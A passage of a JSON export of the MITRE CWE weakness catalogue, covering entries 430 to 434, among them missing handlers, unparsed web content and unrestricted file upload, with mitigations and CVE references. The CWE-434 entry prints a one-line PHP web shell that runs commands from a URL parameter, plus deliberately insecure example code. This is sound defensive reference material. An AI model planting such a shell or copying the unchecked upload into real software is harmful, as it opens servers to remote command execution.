&#34;Process Loading&#34;, Page 654"}}},"Notes":{"Note":[{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"This weakness could apply to any OS that supports spaces in filenames, especially any OS that make it easy for a user to insert spaces into filenames or folders, such as Windows. While spaces are technically supported in Unix, the practice is generally avoided. ."},{"attr":{"@_Type":"Maintenance"},"xhtml:p":["This weakness primarily involves the lack of quoting, which is not explicitly stated as a part of CWE-116. CWE-116 also describes output in light of structured messages, but the generation of a filename or search path (as in this weakness) might not be considered a structured message.","An additional complication is the relationship to control spheres. Unlike untrusted search path (CWE-426), which inherently involves control over the definition of a control sphere, this entry concerns a fixed control sphere in which some part of the sphere may be under attacker control. This is not a clean fit under CWE-668 or CWE-610, which suggests that the control sphere model needs enhancement or clarification."]},{"#text":"Under-studied, probably under-reported.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Description, Maintenance_Notes, Other_Notes, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Applicable_Platforms, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}]}},"430":{"attr":{"@_ID":"430","@_Name":"Deployment of Wrong Handler","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The wrong \\"handler\\" is assigned to process an object.","Extended_Description":"An example of deploying the wrong handler would be calling a servlet to reveal source code of a .JSP file, or automatically \\"determining\\" type of the object even if it is contradictory to an explicitly specified type.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"434","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Resultant","Description":"This weakness is usually resultant from other weaknesses."}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform a type check before interpreting an object."},{"Phase":"Architecture and Design","Description":"Reject any inconsistent types, such as a file with a .GIF extension that appears to consist of PHP code."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0004","Description":"Source code disclosure via manipulated file extension that causes parsing by wrong DLL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0004"},{"Reference":"CVE-2002-0025","Description":"Web browser does not properly handle the Content-Type header field, causing a different application to process the document.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0025"},{"Reference":"CVE-2000-1052","Description":"Source code disclosure by directly invoking a servlet.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1052"},{"Reference":"CVE-2002-1742","Description":"Arbitrary Perl functions can be loaded by calling a non-existent function that activates a handler.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1742"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Improper Handler Deployment"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"11"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;File Handlers&#34;, Page 74"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Improper Handler Deployment","attr":{"@_Date":"2008-04-11"}}}},"431":{"attr":{"@_ID":"431","@_Name":"Missing Handler","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A handler is not available or implemented.","Extended_Description":"When an exception is thrown and not caught, the process has given up an opportunity to decide if a given failure or event is worth a change in execution.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"433","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Handle all possible situations (e.g. error condition)."},{"Phase":"Implementation","Description":"If an operation can throw an Exception, implement a handler for that specific exception."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If a Servlet does not catch all exceptions, it may reveal debugging information that will help an adversary form a plan of attack. In the following method a DNS lookup failure will cause the Servlet to throw an exception.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {}","xhtml:div":{"#text":"String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println(\\"hello \\" + addr.getHostName());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}}},"Body_Text":"When a Servlet throws an exception, the default error response the Servlet container sends back to the user typically includes debugging information. This information is of great value to an attacker."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Handler"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;File Handlers&#34;, Page 74"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"432":{"attr":{"@_ID":"432","@_Name":"Dangerous Signal Handler not Disabled During Sensitive Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running.","Extended_Description":"During the execution of a signal handler, it can be interrupted by another handler when a different signal is sent. If the two handlers share state - such as global variables - then an attacker can corrupt the state by sending another signal before the first handler has completed execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"364","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Turn off dangerous handlers when performing sensitive operations."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"SIG00-C","Entry_Name":"Mask signals handled by noninterruptible signal handlers"},{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Dangerous handler not cleared/disabled during sensitive operations"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Dangerous Handler not Cleared/Disabled During Sensitive Operations","attr":{"@_Date":"2008-04-11"}},{"#text":"Dangerous Handler not Disabled During Sensitive Operations","attr":{"@_Date":"2010-12-13"}}]}},"433":{"attr":{"@_ID":"433","@_Name":"Unparsed Raw Web Content Delivery","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server.","Extended_Description":"If code is stored in a file with an extension such as \\".inc\\" or \\".pl\\", and the web server does not have a handler for that extension, then the server will likely send the contents of the file directly to the requester without the pre-processing that was expected. When that file contains sensitive information such as database credentials, this may allow the attacker to compromise the application or associated components.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"219","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Perform a type check before interpreting files."},{"Phase":"Architecture and Design","Description":"Do not store sensitive information in files which may be misinterpreted."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-104"},"Intro_Text":"The following code uses an include file to store database credentials:","Body_Text":["database.inc","login.php","If the server does not have an explicit handler set for .inc files it may send the contents of database.inc to an attacker without pre-processing, if the attacker requests the file directly. This will expose the database name and password."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?php$dbName = \'usersDB\';$dbPassword = \'skjdh#67nkjd3$3$\';?&gt;","xhtml:br":["","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?phpinclude(\'database.inc\');$db = connectToDB($dbName, $dbPassword);$db.authenticateUser($username, $password);?&gt;","xhtml:br":["","","",""]}}]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1886","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1886"},{"Reference":"CVE-2002-2065","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2065"},{"Reference":"CVE-2005-2029","Description":"\\".inc\\" file stored under web document root and returned unparsed by the server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2029"},{"Reference":"CVE-2001-0330","Description":"direct request to .pl file leaves it unparsed","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330"},{"Reference":"CVE-2002-0614","Description":".inc file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0614"},{"Reference":"CVE-2004-2353","Description":"unparsed config.conf file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2353"},{"Reference":"CVE-2007-3365","Description":"Chain: uppercase file extensions causes web server to return script source code instead of executing the script.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3365"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unparsed Raw Web Content Delivery"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 3, &#34;File Handlers&#34;, Page 74"}}},"Notes":{"Note":{"#text":"This overlaps direct requests (CWE-425), alternate path (CWE-424), permissions (CWE-275), and sensitive file under web root (CWE-219).","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Observed_Examples"}]}},"434":{"attr":{"@_ID":"434","@_Name":"Unrestricted Upload of File with Dangerous Type","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product\'s environment.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"669","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"351","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"436","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"430","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"This can be primary when there is no check at all."},{"Ordinality":"Resultant","Description":"This is frequently resultant when use of double extensions (e.g. \\".php.gif\\") bypasses a sanity check."},{"Ordinality":"Resultant","Description":"This can be resultant from client-side enforcement (CWE-602); some products will include web script in web clients to check the filename, without verifying on the server side."}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Sometimes"}},{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}},{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}],"Technology":{"attr":{"@_Name":"Web Server","@_Prevalence":"Sometimes"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unrestricted File Upload","Description":"The \\"unrestricted file upload\\" term is used in vulnerability databases and elsewhere, but it is insufficiently precise. The phrase could be interpreted as the lack of restrictions on the size or number of uploaded files, which is a resource consumption issue."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Arbitrary code execution is possible if an uploaded file is interpreted and executed as code by the recipient. This is especially true for .asp and .php extensions uploaded to web servers because these file types are often treated as automatically executable, even when file system permissions do not specify execution. For example, in Unix environments, programs typically cannot run unless the execute bit is set, but PHP programs may be executed by the web server without directly invoking them on the operating system."}},"Detection_Methods":{"Detection_Method":[{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Generate a new, unique filename for an uploaded file instead of using the user-supplied filename, so that no external input is used at all.[REF-422] [REF-423]"},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"Phase":"Architecture and Design","Description":"Consider storing the uploaded files outside of the web document root entirely. Then, use other mechanisms to deliver the files dynamically. [REF-423]"},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","For example, limiting filenames to alphanumeric characters can help to restrict the introduction of unintended file extensions."]}},{"Phase":"Architecture and Design","Description":"Define a very limited set of allowable extensions and only generate filenames that end in these extensions. Consider the possibility of XSS (CWE-79) before allowing .html or .htm file types."},{"Phase":"Implementation","Strategy":"Input Validation","Description":"Ensure that only one extension is used in the filename. Some web servers, including some versions of Apache, may process files based on inner extensions so that \\"filename.php.gif\\" is fed to the PHP interpreter.[REF-422] [REF-423]"},{"Phase":"Implementation","Description":"When running on a web server that supports case-insensitive filenames, perform case-insensitive evaluations of the extensions that are provided."},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"Phase":"Implementation","Description":"Do not rely exclusively on sanity checks of file contents to ensure that the file is of the expected type and size. It may be possible for an attacker to hide code in some file segments that will still be executed by the server. For example, GIF images may contain a free-form comments field."},{"Phase":"Implementation","Description":"Do not rely exclusively on the MIME content type or filename attribute when determining how to render a file. Validating the MIME content type and ensuring that it matches the extension is only a partial solution."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code intends to allow a user to upload a picture to the web server. The HTML code that drives the form on the user end has an input field of type \\"file\\".","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"upload_picture.php\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$target = \\"pictures/\\" . basename($_FILES[\'uploadedfile\'][\'name\']);if(move_uploaded_file($_FILES[\'uploadedfile\'][\'tmp_name\'], $target)){}else{}","xhtml:br":["","","","","","","","","",""],"xhtml:i":["// Define the target location where the picture being","// uploaded is going to be saved.","// Move the uploaded file to the new location."],"xhtml:div":[{"#text":"echo \\"The picture has been successfully uploaded.\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \\"There was an error uploading the picture, please try again.\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"malicious.php"},{"attr":{"@_Nature":"attack","@_Language":"PHP"},"xhtml:div":{"#text":"&lt;?php?&gt;","xhtml:div":{"#text":"system($_GET[\'cmd\']);","attr":{"@_style":"margin-left:10px;"}},"xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l"}],"Body_Text":["Once submitted, the form above sends the file to upload_picture.php on the web server. PHP stores the file in a temporary location until it is retrieved (or discarded) by the server side code. In this example, the file is moved to a more permanent pictures/ directory.","The problem with the above code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name:","Since this filename ends in \\".php\\" it can be executed by the web server. In the contents of this uploaded file, the attacker could use:","Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as:","which runs the \\"ls -l\\" command - or any other type of command that the attacker wants to specify."]},{"attr":{"@_Demonstrative_Example_ID":"DX-22"},"Intro_Text":"The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java 